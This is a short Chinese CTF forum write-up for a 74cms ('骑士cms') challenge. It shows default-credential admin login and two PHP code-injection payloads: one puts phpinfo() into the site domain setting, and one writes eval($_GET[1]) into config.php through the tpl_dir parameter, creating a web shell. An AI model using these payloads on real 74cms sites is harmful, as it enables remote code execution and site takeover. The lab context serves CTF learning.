设为首页
收藏本站
只需一步,快速开始
首页
Portal
论坛
BBS
问答
CTF社群
Group
CTF平台
每日签到
青少年CTF论坛
»
论坛
›
CTF
›
Web
›
查看内容
0 评论
0 收藏
分享
骑士cms01--WP
虾虾一米六
发布于 2023-3-13 00:42:58
阅读 958
查看全部
来自
江苏
#骑士cms01 打开划到最底下发现是74cms  百度一下很多getshell的办法选一个 http: //127.0.0.1/index.php?m=Admin 访问后台发现需要登陆,尝试使用admin 123456发现错误然后在尝试admin ;admin发现成功登陆,  将网站域名修改 http://127.0.0.1/.',phpinfo(),'/.com 再次刷新得到phpinfo()页面  搜索qsnctf得到flag 再来一个解法  http: //127.0.0.1/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'  http: //127.0.0.1/Application/Home/Conf/config.php?1=phpinfo(); 搜索qsnctf即可得到flag
回复
举报
使用道具
分享
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
上一篇:
帝国cms01-03 --WP
下一篇:
nics_easyweb--WP
全部回复
暂无回帖,快来参与回复吧
返回列表
发新帖
本版积分规则
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
浏览过的版块
Osint
Misc
虾虾一米六
注册会员
主题
11
回复
2
粉丝
0
加好友
发私信
热点排行
1
题目:再签到一次
2
【新平台】回复换FLAG啦!
3
【活动】小光的答案之书
4
【活动】你知道小光的答案吗?
5
LiHua's checkme WP
6
入门需要怎么做?
7
取证-SSH-04
8
misc中怎么分辨各工具加密后的数据
9
sqlmap连接不到目标RUL
10
做题的时候用了pwntools的 SigreturnFrame()直接报错了有大佬能看看吗
快速回复
返回顶部
返回列表
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜